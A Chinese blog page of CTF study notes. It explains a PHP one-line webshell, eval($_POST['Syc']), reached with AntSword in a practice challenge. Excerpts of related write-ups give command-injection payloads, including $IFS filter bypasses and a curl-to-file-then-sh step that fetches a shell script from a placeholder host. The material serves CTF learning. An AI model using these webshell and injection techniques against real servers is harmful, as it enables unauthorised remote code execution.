CTF学习笔记——Knife&Exec

最新推荐文章于 2025-06-13 13:31:07 发布
原创 最新推荐文章于 2025-06-13 13:31:07 发布 · 730 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文记录了两场CTF比赛中的解题过程,涉及网络安全中的一句话木马利用。在[极客大挑战 2019]Knife中,通过蚁剑连接并利用php eval()函数找到flag;而在[ACTF2020 新生赛]Exec中,直接访问文件即能执行指令。解题经验总结,提升网络安全攻防技能。

一、[极客大挑战 2019]Knife

1.题目

在这里插入图片描述

2.解题步骤

乍一看题目中的代码,提示是菜刀,于是用蚁剑连接一下。
在这里插入图片描述
连接成功
在这里插入图片描述
返回到主目录,发现flag的文件
在这里插入图片描述
找到FLAG
在这里插入图片描述

3.总结
  1. 学会了蚁剑和菜刀的用法,用密码连接
  2. eval($_POST["Syc"]);是php一句话木马,其中eval()函数是把函数中的内容按代码方式执行,而$_POST是可以提交文件。因此菜刀可以留后门。

最低0.47元/天 解锁文章
Obs_cure
关注
百度杯CTF比赛 十月场-EXEC
r00tnb的博客
07-26 1806
前言 这道题本来要用bash反弹shell的技术的,但是由于没有公网ip的服务器,我就用了命令盲注的方法,特此记录一下。 分析 打开链接题目提示no sign。查看源代码发现这一行 <meta language='utf-8' editor='vim'> 于是就想到了vim信息泄露,于是访问.index.php.swp成功下载了源代码 <html> ...
i春秋 “百度杯”CTF比赛 十月场 Exec
include_heqile的博客
10-08 1298
https://www.ichunqiu.com/battalion?t=1&r=0 进入题目链接,是一只猫咪 查看网页源代码: <html> <head> <title>blind cmd exec</title> &
CTF-shell_exec-Wp
qq_28545703的博客
10-29 1613
CTF-shell_exec-Wp 题目是这样的,ping命令测试 查看html源代码看到一个tip 解题过程一 经过大量测试目的其实就是执行cat /flag 但是发现有过滤了空格,这里我们$IFS$9代替 我是利用echo curl http://xxxxx.com/1.php >a ,然后执行sh a这样拿shell的,需要绕过php 最终poc: #第一条,把vps的<?php system('cat /flag')>写进去a `echo$IFS$9curl$IFS$9112h
CTF-Web-[极客大挑战 2019]Knife
归子莫的博客
05-03 6468
CTF-Web-[极客大挑战 2019]Knife 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战 2019]Knife 打开题目的实例 思路 看到这种题目,首先到处点一点,看...
“百度杯”CTF比赛 十月场EXEC
weixin_34248849的博客
04-02 234
前面比较常规吧看源代码-看到vim 然后就是 .index.php.swp 然后就是 这个文件的恢复,用linux下vim -r index.php.swp 就可以看到不是乱码的文件了 然后就是审核源码 1.用了ord()[返回第一个的acsii编码] 函数 大概条件的条件就是 不能是数字 2.用16进制的就可以绕过了0xabcdef == '11259375' 条件为真 然后主要...
CTF学习笔记——Havefun&easy_tornado
Obs_cure的博客
08-23 1377
一、[极客大挑战 2019]Havefun 1.题目 2.解题步骤 虽然作为一个php废物,但是看到下面注释里写的明显是要提交一个get变量,而且很明显有一个dog的提示,就尝试输入一下: 成功爆出flag。 3.总结 这是第一次自己不看writeup做出来的web题,泪目。回头看了一些writeup发现这道题在给cat变量赋值的时候会显示出来,如果赋dog会出flag,但是输入其他值并没有回显,不清楚为什么。 二、[护网杯 2018]easy_tornado 1.题目 题目界面是三个文件夹,依次进入
CTFweb篇——GET&POST
热门推荐
suiyideAli的博客
09-21 2万+
0x00 前言 1. 首先使用BurpSuite 抓取一个http文件进行分析 2. 左边为请求信息,右边为响应信息;请求信息有三部分组成,分别为请求行、请求头、和请求正文组成。响应信息也有三部分组成,分别为响应行、响应 头、响应正文。 3. 首先可以看一下请求行 GET /index.php?tn=monline_3_dg HTTP/1.1 GET方法。GET方法用于获...
CTF学习笔记——Upload
Obs_cure的博客
02-08 2826
一、 1.题目 2.解题步骤 3.总结 4.参考资料
CTF学习笔记——Easy Calc
Obs_cure的博客
09-06 1704
一、[RoarCTF 2019]Easy Calc 1.题目 2.解题步骤 发现框框…应该是注入题…源码中提示有个waf,继续看源码,发现有个calc.php,进去看看 初步理解应该是用num传参,然后返回计算结果,这个php文件用于过滤非法字符。 被拦下来了,大概是利用num构造一个payload,不能含有字母和非法字符,只能有数字和符号 这里已经不会了,看writeup吧… 3.总结 4.参考资料 [RoarCTF 2019]Easy Calc(http走私 && 利用PHP的
BMZCTF shell_exec
qq_26243045的博客
11-28 546
考点:命令执行 打开题目能猜出来是考命令执行。 做了半天发现底部有个语法提示。 过滤了很多命令,但是head还可以执行。用在取反符号中写入命令,完整payload `head$IFS$9/fla?$IFS$9>1.txt` 拿到flag ...
Exec CTF题目
weixin_44971601的博客
09-29 497
BUUCTF命令执行漏洞题目
i春秋——“百度杯”CTF比赛 十月场——EXEC(命令执行、带外通道传输数据)...
weixin_30292843的博客
10-14 634
查看源码得知由vim编写,所以查找备份以及交换文件 找到 /.index.php.swp ,下载后用vim -r恢复该文件即可得到源码 1 <html> 2 <head> 3 <title>blind cmd exec</title> 4 <meta language='utf-8' editor='vim'...
百度杯CTF比赛 十月场-------EXEC
大方子
08-30 2846
=============================== 个人收获 1.命令盲注 2.vim文件泄露 3.nc的使用   ================================   题目:   查看源码出现这个,猜测为vim文件泄露 再浏览器输入.index.php.swp果然出现下载连接   我们把下载来的文件用 vim打开 vim -r ...
php exec ctf,[CTF_web]exec/exec2.php
weixin_42499201的博客
03-17 392
CTF_web源码如下 :$ip = isset($_GET['ip'])?$_GET['ip']:die();if(!preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/i',$ip)){die("ip 格式错误!");}echo strlen($ip);if(strlen($ip)<7||strlen($ip)>21){die("ip ...
BMZCTF:shell_exec
末初 · mochu7
01-24 1139
http://bmzclub.cn/challenges#shell_exec 命令执行绕过 ping -c 2 "$_POST[ip]" 2>&1 2>&1是将标准出错重定向到标准输出,也是就是我们直接在ip位置传入命令是没有回显的,需要在这个位置定义一个标准输出文件即以下这种形式 ping -c 2 "command>1.txt" 2>&1 fuzz一下发现同时还过滤了很多关键字符,但是发现没有过滤反引号,即可构造 `ls>1.txt`
BUUCTF之Knife
金 帛的博客
04-06 939
BUUCTFWP
[ACTF2020 新生赛]Exec
SuperherRo的博客
08-28 940
[ACTF2020 新生赛]Exec 解题
BUUCTF在线评测-练习场-WebCTF习题[ACTF2020 新生赛]Exec1-flag获取、解析
最新发布
m0_56970656的博客
06-13 576
比较简单的命令注入攻击吧,这里犯了点错误就是一开始没有尝试能否穿越目录查看目录下有什么文件,直接尝试查看/etc/passwd这些敏感文件了,结果一无所获..应该先看下整体有什么文件的,毕竟是个简单题。总结一下就是要会linux命令,管道符,cat,ls,绝对路径 相对路径。
ctf中遇到exec和shell_exec的回显问题
weixin_74761057的博客
12-19 736
exec函数会将系统命令拆分成多个参数,然后逐个执行,而shell_exec函数只需要一次性执行,所以shell_exec函数执行效率更高。exec函数会返回最后一行执行结果,如果执行的命令有多行输出,只会返回最后一行,而shell_exec函数会返回执行结果的全部内容。exec函数会返回最后一行执行结果,如果执行的命令有多行输出,只会返回最后一行,而shell_exec函数会返回执行结果的全部内容。同时,shell_exec等同于``反引号。
掌握CTF拼图技巧——puzzle例题详解
同时,链接提供的文章可能包含了题目的详细说明、解题思路和答案解析,对于学习和训练CTF技能的个人或团队来说,这是一个极好的学习材料。 至于给出的标签“ctf”,这是该文件的分类标签,用于标识这个文件与CTF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值